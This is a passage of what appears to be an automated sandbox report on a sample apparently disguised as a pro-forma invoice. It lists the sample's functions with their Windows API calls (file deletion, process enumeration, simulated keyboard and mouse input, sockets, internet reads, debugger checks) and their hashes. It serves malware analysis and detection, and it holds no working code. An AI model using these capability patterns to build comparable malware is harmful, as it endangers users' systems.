                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                    • String ID:
                                    • API String ID: 540024437-0
                                    • Opcode ID: be237985e5b59a8989c4c502e6e7859281a8d5443a1989d937add56c7b1f70a8
                                    • Instruction ID: 86634bee954c9369a2407b7ec64706f1377ae420acfff4e9c30edd4a8ac38ccd
                                    • Opcode Fuzzy Hash: be237985e5b59a8989c4c502e6e7859281a8d5443a1989d937add56c7b1f70a8
                                    • Instruction Fuzzy Hash: B341A4356002009FD711EF64C494B6ABBE9BF46318F1985C9D8568F2D6C771ED82CBE1
                                    APIs
                                      • Part of subcall function 00303AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00303A97,?,?,00302E7F,?,?,?,00000000), ref: 00303AC2
                                      • Part of subcall function 0036E199: GetFileAttributesW.KERNEL32(?,0036CF95), ref: 0036E19A
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0036D420
                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0036D470
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0036D481
                                    • FindClose.KERNEL32(00000000), ref: 0036D498
                                    • FindClose.KERNEL32(00000000), ref: 0036D4A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 2649000838-1173974218
                                    • Opcode ID: 65c9b1f9ed9d8d6e74878fcfd92eac6099961e23a1e4641cc37389bd768f57d6
                                    • Instruction ID: 82bd163fab2e3cf2c9a6fedd6d6ef0d39e4a7a743e016583e8cc59ee303f83af
                                    • Opcode Fuzzy Hash: 65c9b1f9ed9d8d6e74878fcfd92eac6099961e23a1e4641cc37389bd768f57d6
                                    • Instruction Fuzzy Hash: B1316B315193459BC207EF65D8A29AFB7ACAE91300F448E1EF4D197191EF31AE098B62
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                    • API String ID: 4168288129-2761157908
                                    • Opcode ID: 69ab29ab3bd5f814578fad48cbb49b0827d9a995d6b2b526727eac8d47432d08
                                    • Instruction ID: 5f8f114a6077b0e3a734b17fb1e9a3d122a883b714c5b77af616dd0b074f92f3
                                    • Opcode Fuzzy Hash: 69ab29ab3bd5f814578fad48cbb49b0827d9a995d6b2b526727eac8d47432d08
                                    • Instruction Fuzzy Hash: 01C24D71E086288FDB26CF28DD807EAB7B9EB45305F5541EAD44DE7281E774AE818F40
                                    APIs
                                    • _wcslen.LIBCMT ref: 003764DC
                                    • CoInitialize.OLE32(00000000), ref: 00376639
                                    • CoCreateInstance.OLE32(0039FCF8,00000000,00000001,0039FB68,?), ref: 00376650
                                    • CoUninitialize.OLE32 ref: 003768D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                    • String ID: .lnk
                                    • API String ID: 886957087-24824748
                                    • Opcode ID: 1d36eef311c99ffebbbba0d1ef735b73c9598ad10ded17ba7ab82853e627b6d1
                                    • Instruction ID: 645ae4f1b716b2363f1b0a1071e3e4bb1980f8baabf93a142f38706ff1a53ee0
                                    • Opcode Fuzzy Hash: 1d36eef311c99ffebbbba0d1ef735b73c9598ad10ded17ba7ab82853e627b6d1
                                    • Instruction Fuzzy Hash: 3ED15A71509601AFC315EF24C8A2E6BB7E8FF95704F00896DF5998B292DB70ED05CB92
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 003822E8
                                      • Part of subcall function 0037E4EC: GetWindowRect.USER32(?,?), ref: 0037E504
                                    • GetDesktopWindow.USER32 ref: 00382312
                                    • GetWindowRect.USER32(00000000), ref: 00382319
                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00382355
                                    • GetCursorPos.USER32(?), ref: 00382381
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003823DF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                    • String ID:
                                    • API String ID: 2387181109-0
                                    • Opcode ID: 0418e66483f94db0772556ca441f145fb554903c40d52df290a3b70a592bfc7d
                                    • Instruction ID: 69e6ad16596597a0675aa0407667a02ac1033397c6e3c50c1f7a54bb6927b0fd
                                    • Opcode Fuzzy Hash: 0418e66483f94db0772556ca441f145fb554903c40d52df290a3b70a592bfc7d
                                    • Instruction Fuzzy Hash: BB31E076504315AFDB22EF55C849B9BBBEDFF88310F00091AF98597181DB75EA08CB92
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00379B78
                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00379C8B
                                      • Part of subcall function 00373874: GetInputState.USER32 ref: 003738CB
                                      • Part of subcall function 00373874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00373966
                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00379BA8
                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00379C75
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                    • String ID: *.*
                                    • API String ID: 1972594611-438819550
                                    • Opcode ID: acefa3723bf395ea9f5a2b690b7e82d05b3aa905fdb0bb9c75e5b25b1167f014
                                    • Instruction ID: 341b222cf0db9bb4fcc42d9f652da02ed2d6d7ffebf4b8e8f23848aa06ad07b6
                                    • Opcode Fuzzy Hash: acefa3723bf395ea9f5a2b690b7e82d05b3aa905fdb0bb9c75e5b25b1167f014
                                    • Instruction Fuzzy Hash: 0341847190120AAFCF27DF64C995BEE7BB8EF05310F148196E409A7291DB359E44CF60
                                    APIs
                                      • Part of subcall function 00319BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00319BB2
                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00319A4E
                                    • GetSysColor.USER32(0000000F), ref: 00319B23
                                    • SetBkColor.GDI32(?,00000000), ref: 00319B36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Color$LongProcWindow
                                    • String ID:
                                    • API String ID: 3131106179-0
                                    • Opcode ID: 7689c712deba257140830563a4995b487f8058b16271f8e3b3d1b1d92486c568
                                    • Instruction ID: 8c915b06377aec254bad198b58d6b4c54200f65e77f298a2edf6d96bccc7e6e2
                                    • Opcode Fuzzy Hash: 7689c712deba257140830563a4995b487f8058b16271f8e3b3d1b1d92486c568
                                    • Instruction Fuzzy Hash: 66A11F70208444BFE72F9A2CAC78FFB269DDF4E341F16410BF802CA9A1C6259D89D271
                                    APIs
                                      • Part of subcall function 0038304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0038307A
                                      • Part of subcall function 0038304E: _wcslen.LIBCMT ref: 0038309B
                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0038185D
                                    • WSAGetLastError.WSOCK32 ref: 00381884
                                    • bind.WSOCK32(00000000,?,00000010), ref: 003818DB
                                    • WSAGetLastError.WSOCK32 ref: 003818E6
                                    • closesocket.WSOCK32(00000000), ref: 00381915
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 1601658205-0
                                    • Opcode ID: 8fe7b8e9a4ab8f9a8ca30a89da00a7d33bbf9cbf69661d5007b41c9debbdb10e
                                    • Instruction ID: e176a0e79bc3ce5eee54defc253dacfd12ad23d7bc2a27c78fb47a69295a0e6e
                                    • Opcode Fuzzy Hash: 8fe7b8e9a4ab8f9a8ca30a89da00a7d33bbf9cbf69661d5007b41c9debbdb10e
                                    • Instruction Fuzzy Hash: 3551C671A002009FD716AF24C896F6A77E9AB49718F14849CF9055F3D3CB71AD82CBE1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: 69398bb1b479c58fd70f7282efbfe2350cc57c505e45caab6312fc42ae9b1e43
                                    • Instruction ID: 4dcb2ee70cd6cb8fafdfeb10971a2459a8a7471ec022463465bab1d301bfa276
                                    • Opcode Fuzzy Hash: 69398bb1b479c58fd70f7282efbfe2350cc57c505e45caab6312fc42ae9b1e43
                                    • Instruction Fuzzy Hash: 7F21F7317402025FDB228F1AC844F6A7BE9EF85314F1A9069E846DB351CB72DC42CF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                    • API String ID: 0-1546025612
                                    • Opcode ID: 8539cfbc38b59d3e539d13efd7d98d0dd3da443495d1c501afce494a81b94fec
                                    • Instruction ID: f0c09ad4b708375f49cf1fa10df1824bcb48058dcfe26f17ceb0676e829bbc48
                                    • Opcode Fuzzy Hash: 8539cfbc38b59d3e539d13efd7d98d0dd3da443495d1c501afce494a81b94fec
                                    • Instruction Fuzzy Hash: 33A2D070E0161ACBDF26CF58C8517AEB7B1FF45310F2581AAE855AB285DB30AD81CF91
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003682AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($tb<$|
                                    • API String ID: 1659193697-3847509607
                                    • Opcode ID: 99b841ded16888f2b388ea82d90e6c64cb0f1968a6aace4821e30919c8847a0f
                                    • Instruction ID: 3a40e8156e127f9c210eea814866d340e174a0112a6b379ab183899615a7495b
                                    • Opcode Fuzzy Hash: 99b841ded16888f2b388ea82d90e6c64cb0f1968a6aace4821e30919c8847a0f
                                    • Instruction Fuzzy Hash: 39324778A007059FCB29CF19C081A6AB7F0FF48710B15C56EE59ADB7A1EB70E941CB44
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0038A6AC
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0038A6BA
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • Process32NextW.KERNEL32(00000000,?), ref: 0038A79C
                                    • CloseHandle.KERNEL32(00000000), ref: 0038A7AB
                                      • Part of subcall function 0031CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00343303,?), ref: 0031CE8A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                    • String ID:
                                    • API String ID: 1991900642-0
                                    • Opcode ID: c445bb2693226d5bd4125575a9f67d3418a3a51a25f69a97f840445812ec7ee7
                                    • Instruction ID: 3dfd74c79c8a1ebd340cf6f4d81c8b91968f635b25ca468386de4d91c3356be5
                                    • Opcode Fuzzy Hash: c445bb2693226d5bd4125575a9f67d3418a3a51a25f69a97f840445812ec7ee7
                                    • Instruction Fuzzy Hash: 80518F715083009FD715EF24C896E6BBBE8FF89754F00895EF5859B292EB30D904CBA2
                                    APIs
                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0036AAAC
                                    • SetKeyboardState.USER32(00000080), ref: 0036AAC8
                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0036AB36
                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0036AB88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 19a4ceac489976da88e6c3ddb42bec5bf8f73cbffc100f4c23f1cb8a236fd6cf
                                    • Instruction ID: 3a254d4dd0b90ec2db2822ffb7c10c144a936fb898a15e75a2e2bd0aea953e68
                                    • Opcode Fuzzy Hash: 19a4ceac489976da88e6c3ddb42bec5bf8f73cbffc100f4c23f1cb8a236fd6cf
                                    • Instruction Fuzzy Hash: 9531E930A40A48AEEB37CA65CC05BFE7BAAAB45310F04C21BE581671D9D3758D81DB66
                                    APIs
                                    • _free.LIBCMT ref: 0033BB7F
                                      • Part of subcall function 003329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000), ref: 003329DE
                                      • Part of subcall function 003329C8: GetLastError.KERNEL32(00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000,00000000), ref: 003329F0
                                    • GetTimeZoneInformation.KERNEL32 ref: 0033BB91
                                    • WideCharToMultiByte.KERNEL32(00000000,?,003D121C,000000FF,?,0000003F,?,?), ref: 0033BC09
                                    • WideCharToMultiByte.KERNEL32(00000000,?,003D1270,000000FF,?,0000003F,?,?,?,003D121C,000000FF,?,0000003F,?,?), ref: 0033BC36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                    • String ID:
                                    • API String ID: 806657224-0
                                    • Opcode ID: ce7d4b927dcc8726ac24ad47c678162d6487ff44bb296d9672dce4e3778ebcb6
                                    • Instruction ID: 6e27613d7de45369c83bd87dec3c3387c86101ad6b52b33372286579a0fa11bb
                                    • Opcode Fuzzy Hash: ce7d4b927dcc8726ac24ad47c678162d6487ff44bb296d9672dce4e3778ebcb6
                                    • Instruction Fuzzy Hash: DB319C71904205EFCB13DF69EC80969FBBCBF45320F1546AAE161DB2A1DB319A40CB50
                                    APIs
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0037CE89
                                    • GetLastError.KERNEL32(?,00000000), ref: 0037CEEA
                                    • SetEvent.KERNEL32(?,?,00000000), ref: 0037CEFE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorEventFileInternetLastRead
                                    • String ID:
                                    • API String ID: 234945975-0
                                    • Opcode ID: 0e99342de4d5b86654c7b01fe63f90223cc297c82cefff7973b501531b165272
                                    • Instruction ID: fcc0ef994befab0a0656a3bd9744b8f53777d45af3cadfa821051cf8075a69a0
                                    • Opcode Fuzzy Hash: 0e99342de4d5b86654c7b01fe63f90223cc297c82cefff7973b501531b165272
                                    • Instruction Fuzzy Hash: 0921EAB1510305AFEB32CFA5C988BA6B7FCEB00305F10981EE54AD2551E738EE448BA0
                                    APIs
                                    • lstrlenW.KERNEL32(?,00345222), ref: 0036DBCE
                                    • GetFileAttributesW.KERNEL32(?), ref: 0036DBDD
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0036DBEE
                                    • FindClose.KERNEL32(00000000), ref: 0036DBFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                    • String ID:
                                    • API String ID: 2695905019-0
                                    • Opcode ID: b2751edc09d02f37c161f8a87cdba396cfcb69d102ecead2d93d616ca10aee36
                                    • Instruction ID: 2e81c32f7ca7412d5b9f59a4a1af9e3425b9c41fe9fe30f1d88947650f10158f
                                    • Opcode Fuzzy Hash: b2751edc09d02f37c161f8a87cdba396cfcb69d102ecead2d93d616ca10aee36
                                    • Instruction Fuzzy Hash: 8EF0E530C2091857C222AB7CBC0D8AA376C9E01334F508B03F876C20F4EBB25D94C6D9
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 00375CC1
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00375D17
                                    • FindClose.KERNEL32(?), ref: 00375D5F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 3541575487-0
                                    • Opcode ID: 91630b709f7fd99014f2a065f2871bd76928d6dad98b7e7fdb802b119c17bd99
                                    • Instruction ID: e3745e2ee5afe3dbbaf7feb1a339e3513344426217e2760b6edc2487e4c6ef36
                                    • Opcode Fuzzy Hash: 91630b709f7fd99014f2a065f2871bd76928d6dad98b7e7fdb802b119c17bd99
                                    • Instruction Fuzzy Hash: 1C51AA74604A019FC72ACF28C494E96B7E4FF09314F15855EE99A8B3A1CB74FD04CB91
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0033271A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00332724
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00332731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
